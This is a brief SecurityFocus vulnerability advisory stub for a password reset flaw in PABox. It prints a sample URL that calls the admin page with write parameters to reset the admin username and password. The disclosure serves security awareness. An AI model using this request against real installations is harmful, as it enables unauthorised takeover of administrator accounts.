PABox Password Reset Vulnerability

This issue can be exploited with a web browser. The following example was submitted:

http://www.example.com/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin


 

Privacy Statement
Copyright 2010, SecurityFocus